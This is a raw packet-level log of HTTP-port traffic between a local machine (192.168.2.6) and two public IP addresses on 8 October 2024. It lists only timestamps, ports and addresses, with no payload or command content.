Oct 8, 2024 11:31:13.795818090 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795833111 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795850992 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795886040 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795896053 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795964956 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796082973 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796117067 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796161890 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796169043 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796202898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796237946 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796252012 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796289921 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796335936 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796343088 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796394110 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796427965 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796457052 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796472073 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796489954 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796504974 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796544075 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796576023 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796590090 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796608925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796642065 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796654940 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796675920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796708107 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796742916 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796749115 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796776056 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796812057 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796821117 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796845913 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796857119 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796881914 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796926975 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.796932936 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.796986103 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797015905 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797030926 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797065973 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797100067 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797111988 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797154903 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797205925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797240019 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797254086 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797274113 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797306061 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797318935 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797341108 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797348976 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797372103 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797406912 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797420025 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797441959 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797475100 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797508001 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797519922 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797543049 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797575951 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.797590971 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.797617912 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.828058004 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.875731945 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875767946 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875799894 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875814915 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875824928 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875832081 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875839949 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875848055 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875857115 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875857115 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.875864983 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875874996 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875890970 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875901937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.875967026 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.875987053 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.876203060 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876220942 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876245975 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876260996 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.876261950 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876280069 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876292944 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.876296043 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876312971 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876323938 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.876328945 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.876359940 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882626057 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882651091 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882667065 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882692099 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882707119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882709026 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882724047 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882741928 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882744074 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882755995 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882759094 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882776022 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882792950 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882807016 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882814884 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882822990 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882829905 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882844925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.882865906 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.882888079 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.883529902 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.883580923 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:17.838666916 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:25.211425066 CEST	49995	80	192.168.2.6	104.21.93.17
Oct 8, 2024 11:31:25.216566086 CEST	80	49995	104.21.93.17	192.168.2.6
Oct 8, 2024 11:31:25.216661930 CEST	49995	80	192.168.2.6	104.21.93.17
Oct 8, 2024 11:31:25.217078924 CEST	49995	80	192.168.2.6	104.21.93.17
Oct 8, 2024 11:31:25.221970081 CEST	80	49995	104.21.93.17	192.168.2.6
Oct 8, 2024 11:31:25.581769943 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:25.586910009 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:25.587169886 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:25.587169886 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:25.592036963 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:25.733244896 CEST	49995	80	192.168.2.6	104.21.93.17
Oct 8, 2024 11:31:25.738730907 CEST	80	49995	104.21.93.17	192.168.2.6
Oct 8, 2024 11:31:25.738801956 CEST	49995	80	192.168.2.6	104.21.93.17
Oct 8, 2024 11:31:26.212222099 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212300062 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212336063 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212352991 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.212368965 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212407112 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212435007 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.212441921 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212474108 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212503910 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.212507010 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212542057 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212553978 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.212580919 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.212635040 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.217520952 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.217534065 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.217545986 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.217601061 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.304732084 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304749966 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304761887 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304774046 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304786921 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304788113 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.304816961 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.304969072 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.304992914 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305001974 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305018902 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.305047989 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.305377960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305388927 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305409908 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305419922 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305427074 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.305432081 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.305480957 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.306288004 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.306303978 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.306313992 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.306327105 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.306337118 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.306343079 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.306364059 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.306385994 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.307518959 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.307543039 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.307554960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.307565928 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.307579041 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.307600021 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.307631016 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.309832096 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.309899092 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.309912920 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.356888056 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.396928072 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397016048 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397078991 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397144079 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397259951 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397315025 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397349119 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397365093 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397383928 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397398949 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397418022 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397450924 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397464991 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397485018 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397519112 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397532940 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397551060 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397584915 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397631884 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397739887 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397849083 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397897959 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397902012 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.397948980 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.397988081 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398037910 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398072958 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398086071 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.398108006 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398140907 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398154020 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.398174047 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398207903 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398240089 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398241043 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.398274899 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398304939 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.398312092 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398552895 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.398895979 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398948908 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398981094 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.398992062 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399039030 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399087906 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399087906 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399122000 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399153948 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399168968 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399188995 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399221897 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399238110 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399255037 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399379969 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399692059 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399744034 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399779081 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399799109 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399832964 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399867058 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399889946 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.399899960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.399950981 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492260933 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492357969 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492393970 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492413998 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492448092 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492485046 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492520094 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492539883 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492552996 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492566109 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492585897 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492619038 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492666006 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492671013 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492703915 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492737055 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492744923 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492769957 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492782116 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492804050 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492835999 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492846012 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492871046 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492904902 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.492914915 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.492940903 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493380070 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493412971 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493427038 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.493447065 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493458033 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.493479967 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493532896 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493566990 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.493576050 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494049072 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494081974 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494097948 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494115114 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494127989 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494148016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494195938 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494199991 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494231939 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494266033 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494278908 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494299889 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494333029 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494364977 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494379997 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494398117 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494402885 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494434118 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494474888 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.494901896 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494934082 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.494968891 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495006084 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495022058 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495053053 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495066881 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495086908 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495119095 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495151997 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495160103 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495183945 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495215893 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495228052 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495249987 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495260000 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495285988 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495321035 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495326996 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.495912075 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495945930 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495980024 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.495992899 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.496078014 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496110916 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496124029 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.496145964 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.496156931 CEST	49996	80	192.168.2.6	63.250.38.167
